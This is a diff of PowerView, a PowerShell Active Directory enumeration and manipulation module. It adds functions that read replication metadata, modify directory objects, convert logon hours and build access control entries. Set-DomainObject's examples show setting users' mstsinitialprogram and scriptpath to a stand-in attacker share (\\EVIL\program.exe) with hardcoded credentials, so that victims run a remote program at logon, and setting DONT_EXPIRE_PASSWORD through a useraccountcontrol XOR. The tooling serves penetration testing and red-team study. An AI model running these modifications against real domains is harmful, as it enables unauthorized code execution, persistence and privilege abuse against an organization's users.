- } | Where-Object {
- # filter for modifiable rights
- ($_.ActiveDirectoryRights -eq "GenericAll") -or ($_.ActiveDirectoryRights -match "Write") -or ($_.ActiveDirectoryRights -match "Create") -or ($_.ActiveDirectoryRights -match "Delete") -or (($_.ActiveDirectoryRights -match "ExtendedRight") -and ($_.AccessControlType -eq "Allow"))
}
}
-filter Get-GUIDMap {
+function Get-DomainObjectLinkedAttributeHistory {
<#
- .SYNOPSIS
+.SYNOPSIS
- Helper to build a hash table of [GUID] -> resolved names
+Returns the Active Directory links attribute value replication metadata for the
+specified object, i.e. a parsed version of the msds-replvaluemetadata attribute.
+By default, replication data for every domain object is returned.
- Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
- .PARAMETER Domain
-
- The domain to use for the query, defaults to the current domain.
+.DESCRIPTION
- .PARAMETER DomainController
-
- Domain controller to reflect LDAP queries through.
+Wraps Get-DomainObject with a specification to retrieve the property 'msds-replvaluemetadata'.
+This is the domain linked attribute value replication metadata associated with the object. The
+results are parsed from their XML string form and returned as a custom object.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Only return replication metadata on the specified property names.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
- .PARAMETER PageSize
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The PageSize to set for the LDAP searcher object.
+.PARAMETER ResultPageSize
- .LINK
+Specifies the PageSize to set for the LDAP searcher object.
- http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainObjectLinkedAttributeHistory | Group-Object ObjectDN | ft -a
+
+Count Name
+----- ----
+ 4 CN=Administrators,CN=Builtin,DC=testlab,DC=local
+ 4 CN=Users,CN=Builtin,DC=testlab,DC=local
+ 2 CN=Guests,CN=Builtin,DC=testlab,DC=local
+ 1 CN=IIS_IUSRS,CN=Builtin,DC=testlab,DC=local
+ 1 CN=Schema Admins,CN=Users,DC=testlab,DC=local
+ 1 CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+ 4 CN=Domain Admins,CN=Users,DC=testlab,DC=local
+ 1 CN=Group Policy Creator Owners,CN=Users,DC=testlab,DC=local
+ 1 CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=testlab,DC=local
+ 1 CN=Windows Authorization Access Group,CN=Builtin,DC=testlab,DC=local
+ 8 CN=Denied RODC Password Replication Group,CN=Users,DC=testlab,DC=local
+ 2 CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,...
+ 1 CN=Domain System Volume,CN=DFSR-LocalSettings,CN=PRIMARY,OU=Domain Con...
+ 1 CN=ServerAdmins,CN=Users,DC=testlab,DC=local
+ 3 CN=DomainLocalGroup,CN=Users,DC=testlab,DC=local
+
+
+.EXAMPLE
+
+'S-1-5-21-883232822-274137685-4173207997-519','af94f49e-61a5-4f7d-a17c-d80fb16a5220' | Get-DomainObjectLinkedAttributeHistory
+
+ObjectDN : CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+ObjectGuid : 94e782c1-16a1-400b-a7d0-1126038c6387
+AttributeName : member
+AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local
+TimeDeleted : 2017-03-06T00:48:29Z
+TimeCreated : 2017-03-06T00:48:29Z
+LastOriginatingChange : 2017-03-06T00:48:29Z
+Version : 1
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
+ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220
+AttributeName : member
+AttributeValue : CN=dfm,CN=Users,DC=testlab,DC=local
+TimeDeleted : 2017-06-13T22:20:02Z
+TimeCreated : 2017-06-13T22:20:02Z
+LastOriginatingChange : 2017-06-13T22:20:22Z
+Version : 2
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
+ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220
+AttributeName : member
+AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local
+TimeDeleted : 2017-03-06T00:48:29Z
+TimeCreated : 2017-03-06T00:48:29Z
+LastOriginatingChange : 2017-03-06T00:48:29Z
+Version : 1
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+.EXAMPLE
+
+Get-DomainObjectLinkedAttributeHistory ServerAdmins -Domain testlab.local
+
+ObjectDN : CN=ServerAdmins,CN=Users,DC=testlab,DC=local
+ObjectGuid : 603b46ad-555c-49b3-8745-c0718febefc2
+AttributeName : member
+AttributeValue : CN=jason.a,CN=Users,DC=dev,DC=testlab,DC=local
+TimeDeleted : 2017-04-10T22:17:19Z
+TimeCreated : 2017-04-10T22:17:19Z
+LastOriginatingChange : 2017-04-10T22:17:19Z
+Version : 1
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+.OUTPUTS
+
+PowerView.ADObjectLinkedAttributeHistory
+
+Custom PSObject with translated replication metadata fields.
+
+.LINK
+
+https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.ADObjectLinkedAttributeHistory')]
[CmdletBinding()]
- Param (
- [Parameter(ValueFromPipeline=$True)]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
- [ValidateRange(1,10000)]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200
- )
+ $ResultPageSize = 200,
- $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- $SchemaPath = (Get-NetForest).schema.name
+ [Switch]
+ $Tombstone,
- $SchemaSearcher = Get-DomainSearcher -ADSpath $SchemaPath -DomainController $DomainController -PageSize $PageSize
- if($SchemaSearcher) {
- $SchemaSearcher.filter = "(schemaIDGUID=*)"
- try {
- $Results = $SchemaSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- # convert the GUID
- $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0]
- }
- $Results.dispose()
- $SchemaSearcher.dispose()
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'msds-replvaluemetadata','distinguishedname'
+ 'Raw' = $True
}
- catch {
- Write-Verbose "Error in building GUID map: $_"
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['Properties']) {
+ $PropertyFilter = $PSBoundParameters['Properties'] -Join '|'
+ }
+ else {
+ $PropertyFilter = ''
}
}
- $RightsSearcher = Get-DomainSearcher -ADSpath $SchemaPath.replace("Schema","Extended-Rights") -DomainController $DomainController -PageSize $PageSize -Credential $Credential
- if ($RightsSearcher) {
- $RightsSearcher.filter = "(objectClass=controlAccessRight)"
- try {
- $Results = $RightsSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- # convert the GUID
- $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0]
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ $ObjectDN = $_.Properties['distinguishedname'][0]
+ ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {
+ $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue
+ if ($TempObject) {
+ if ($TempObject.pszAttributeName -Match $PropertyFilter) {
+ $Output = New-Object PSObject
+ $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN
+ $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName
+ $Output | Add-Member NoteProperty 'AttributeValue' $TempObject.pszObjectDn
+ $Output | Add-Member NoteProperty 'TimeCreated' $TempObject.ftimeCreated
+ $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted
+ $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
+ $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion
+ $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory')
+ $Output
+ }
+ }
+ else {
+ Write-Verbose "[Get-DomainObjectLinkedAttributeHistory] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'"
+ }
}
- $Results.dispose()
- $RightsSearcher.dispose()
- }
- catch {
- Write-Verbose "Error in building GUID map: $_"
}
}
-
- $GUIDs
}
-function Get-NetComputer {
+function Set-DomainObject {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function utilizes adsisearcher to query the current AD context
- for current computer objects. Based off of Carlos Perez's Audit.psm1
- script in Posh-SecMod (link below).
+Modifies a gven property for a specified active directory object.
- .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
- Return computers with a specific name, wildcards accepted.
+.DESCRIPTION
- .PARAMETER SPN
+Splats user/object targeting parameters to Get-DomainObject, returning the raw
+searchresult object. Retrieves the raw directoryentry for the object, and sets
+any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
+from -Clear @().
- Return computers with a specific service principal name, wildcards accepted.
+.PARAMETER Identity
- .PARAMETER OperatingSystem
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
- Return computers with a specific operating system, wildcards accepted.
+.PARAMETER Set
- .PARAMETER ServicePack
+Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
- Return computers with a specific service pack, wildcards accepted.
+.PARAMETER XOR
- .PARAMETER Filter
+Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
- A customized ldap filter string to use, e.g. "(description=*admin*)"
+.PARAMETER Clear
- .PARAMETER Printers
+Specifies an array of object properties that will be cleared in the directory.
- Switch. Return only printers.
+.PARAMETER Domain
- .PARAMETER Ping
+Specifies the domain to use for the query, defaults to the current domain.
- Switch. Ping each host to ensure it's up before enumerating.
+.PARAMETER LDAPFilter
- .PARAMETER FullData
+Specifies an LDAP query string that is used to filter Active Directory objects.
- Switch. Return full computer objects instead of just system names (the default).
+.PARAMETER SearchBase
- .PARAMETER Domain
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The domain to query for computers, defaults to the current domain.
+.PARAMETER Server
- .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
- .PARAMETER ADSpath
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
-
- .PARAMETER SiteName
+.PARAMETER ResultPageSize
- The AD Site name to search for computers.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER Unconstrained
+.PARAMETER ServerTimeLimit
- Switch. Return computer objects that have unconstrained delegation.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER PageSize
+.PARAMETER Tombstone
- The PageSize to set for the LDAP searcher object.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER Credential
+.PARAMETER Credential
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetComputer
-
- Returns the current computers in current domain.
+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
- .EXAMPLE
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\EVIL\program.exe for object testuser
- PS C:\> Get-NetComputer -SPN mssql*
-
- Returns all MS SQL servers on the domain.
+.EXAMPLE
- .EXAMPLE
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose
- PS C:\> Get-NetComputer -Domain testing
-
- Returns the current computers in 'testing' domain.
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string:
+(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))
+VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object harmj0y
+VERBOSE: Setting countrycode to 1234 for object harmj0y
+VERBOSE: Get-DomainSearcher search string:
+LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object testuser
+VERBOSE: Setting countrycode to 1234 for object testuser
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetComputer -Domain testing -FullData
-
- Returns full computer objects in the 'testing' domain.
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose
- .LINK
+Cleares the 'department' field for both object identities.
- https://github.com/darkoperator/Posh-SecMod/blob/master/Audit/Audit.psm1
-#>
+.EXAMPLE
- [CmdletBinding()]
- Param (
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [String]
- $ComputerName = '*',
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
- [String]
- $SPN,
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
- [String]
- $OperatingSystem,
- [String]
- $ServicePack,
+Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose
- [String]
- $Filter,
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'
- [Switch]
- $Printers,
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
- [Switch]
- $Ping,
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
- [Switch]
- $FullData,
+.EXAMPLE
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\primary\sysvol\blah.ps1
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'} -Credential $Cred -Verbose
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\EVIL\program2.exe' for object 'testuser'
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\EVIL\program2.exe
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Replace')]
+ [Hashtable]
+ $Set,
+
+ [ValidateNotNullOrEmpty()]
+ [Hashtable]
+ $XOR,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Clear,
+
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $ADSpath,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $SiteName,
+ $Server,
- [Switch]
- $Unconstrained,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
- # so this isn't repeated if multiple computer names are passed on the pipeline
- $CompSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize -Credential $Credential
+ BEGIN {
+ $SearcherArguments = @{'Raw' = $True}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
}
- process {
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
- if ($CompSearcher) {
+ # splat the appropriate arguments to Get-DomainObject
+ $RawObject = Get-DomainObject @SearcherArguments
- # if we're checking for unconstrained delegation
- if($Unconstrained) {
- Write-Verbose "Searching for computers with for unconstrained delegation"
- $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
- }
- # set the filters for the seracher if it exists
- if($Printers) {
- Write-Verbose "Searching for printers"
- # $CompSearcher.filter="(&(objectCategory=printQueue)$Filter)"
- $Filter += "(objectCategory=printQueue)"
- }
- if($SPN) {
- Write-Verbose "Searching for computers with SPN: $SPN"
- $Filter += "(servicePrincipalName=$SPN)"
- }
- if($OperatingSystem) {
- $Filter += "(operatingsystem=$OperatingSystem)"
- }
- if($ServicePack) {
- $Filter += "(operatingsystemservicepack=$ServicePack)"
- }
- if($SiteName) {
- $Filter += "(serverreferencebl=$SiteName)"
- }
+ ForEach ($Object in $RawObject) {
- $CompFilter = "(&(sAMAccountType=805306369)(dnshostname=$ComputerName)$Filter)"
- Write-Verbose "Get-NetComputer filter : '$CompFilter'"
- $CompSearcher.filter = $CompFilter
+ $Entry = $RawObject.GetDirectoryEntry()
- try {
- $Results = $CompSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- $Up = $True
- if($Ping) {
- # TODO: how can these results be piped to ping for a speedup?
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname
- }
- if($Up) {
- # return full data objects
- if ($FullData) {
- # convert/process the LDAP fields for each result
- $Computer = Convert-LDAPProperty -Properties $_.Properties
- $Computer.PSObject.TypeNames.Add('PowerView.Computer')
- $Computer
- }
- else {
- # otherwise we're just returning the DNS host name
- $_.properties.dnshostname
- }
+ if($PSBoundParameters['Set']) {
+ try {
+ $PSBoundParameters['Set'].GetEnumerator() | ForEach-Object {
+ Write-Verbose "[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'"
+ $Entry.put($_.Name, $_.Value)
}
+ $Entry.commitchanges()
+ }
+ catch {
+ Write-Warning "[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_"
}
- $Results.dispose()
- $CompSearcher.dispose()
}
- catch {
- Write-Warning "Error: $_"
+ if($PSBoundParameters['XOR']) {
+ try {
+ $PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object {
+ $PropertyName = $_.Name
+ $PropertyXorValue = $_.Value
+ Write-Verbose "[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'"
+ $TypeName = $Entry.$PropertyName[0].GetType().name
+
+ # UAC value references- https://support.microsoft.com/en-us/kb/305144
+ $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue
+ $Entry.$PropertyName = $PropertyValue -as $TypeName
+ }
+ $Entry.commitchanges()
+ }
+ catch {
+ Write-Warning "[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_"
+ }
+ }
+ if($PSBoundParameters['Clear']) {
+ try {
+ $PSBoundParameters['Clear'] | ForEach-Object {
+ $PropertyName = $_
+ Write-Verbose "[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'"
+ $Entry.$PropertyName.clear()
+ }
+ $Entry.commitchanges()
+ }
+ catch {
+ Write-Warning "[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_"
+ }
}
}
}
}
-function Get-ADObject {
+function ConvertFrom-LDAPLogonHours {
<#
- .SYNOPSIS
+.SYNOPSIS
- Takes a domain SID and returns the user, group, or computer object
- associated with it.
+Converts the LDAP LogonHours array to a processible object.
- .PARAMETER SID
+Author: Lee Christensen (@tifkin_)
+License: BSD 3-Clause
+Required Dependencies: None
- The SID of the domain object you're querying for.
+.DESCRIPTION
- .PARAMETER Name
+Converts the LDAP LogonHours array to a processible object. Each entry
+property in the output object corresponds to a day of the week and hour during
+the day (in UTC) indicating whether or not the user can logon at the specified
+hour.
- The Name of the domain object you're querying for.
+.PARAMETER LogonHoursArray
- .PARAMETER SamAccountName
+21-byte LDAP hours array.
- The SamAccountName of the domain object you're querying for.
+.EXAMPLE
- .PARAMETER Domain
+$hours = (Get-DomainUser -LDAPFilter 'userworkstations=*')[0].logonhours
+ConvertFrom-LDAPLogonHours $hours
- The domain to query for objects, defaults to the current domain.
+Gets the logonhours array from the first AD user with logon restrictions.
- .PARAMETER DomainController
+.OUTPUTS
- Domain controller to reflect LDAP queries through.
+PowerView.LogonHours
+#>
- .PARAMETER ADSpath
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.LogonHours')]
+ [CmdletBinding()]
+ Param (
+ [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [byte[]]
+ $LogonHoursArray
+ )
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+ Begin {
+ if($LogonHoursArray.Count -ne 21) {
+ throw "LogonHoursArray is the incorrect length"
+ }
- .PARAMETER Filter
+ function ConvertTo-LogonHoursArray {
+ Param (
+ [int[]]
+ $HoursArr
+ )
- Additional LDAP filter string for the query.
+ $LogonHours = New-Object bool[] 24
+ for($i=0; $i -lt 3; $i++) {
+ $Byte = $HoursArr[$i]
+ $Offset = $i * 8
+ $Str = [Convert]::ToString($Byte,2).PadLeft(8,'0')
- .PARAMETER ReturnRaw
+ $LogonHours[$Offset+0] = [bool] [convert]::ToInt32([string]$Str[7])
+ $LogonHours[$Offset+1] = [bool] [convert]::ToInt32([string]$Str[6])
+ $LogonHours[$Offset+2] = [bool] [convert]::ToInt32([string]$Str[5])
+ $LogonHours[$Offset+3] = [bool] [convert]::ToInt32([string]$Str[4])
+ $LogonHours[$Offset+4] = [bool] [convert]::ToInt32([string]$Str[3])
+ $LogonHours[$Offset+5] = [bool] [convert]::ToInt32([string]$Str[2])
+ $LogonHours[$Offset+6] = [bool] [convert]::ToInt32([string]$Str[1])
+ $LogonHours[$Offset+7] = [bool] [convert]::ToInt32([string]$Str[0])
+ }
- Switch. Return the raw object instead of translating its properties.
- Used by Set-ADObject to modify object properties.
+ $LogonHours
+ }
+ }
- .PARAMETER PageSize
+ Process {
+ $Output = @{
+ Sunday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[0..2]
+ Monday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[3..5]
+ Tuesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[6..8]
+ Wednesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[9..11]
+ Thurs = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[12..14]
+ Friday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[15..17]
+ Saturday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[18..20]
+ }
- The PageSize to set for the LDAP searcher object.
+ $Output = New-Object PSObject -Property $Output
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours')
+ $Output
+ }
+}
+
+
+function New-ADObjectAccessControlEntry {
+<#
+.SYNOPSIS
+
+Creates a new Active Directory object-specific access control entry.
+
+Author: Lee Christensen (@tifkin_)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+Creates a new object-specific access control entry (ACE). The ACE could be
+used for auditing access to an object or controlling access to objects.
+
+.PARAMETER PrincipalIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
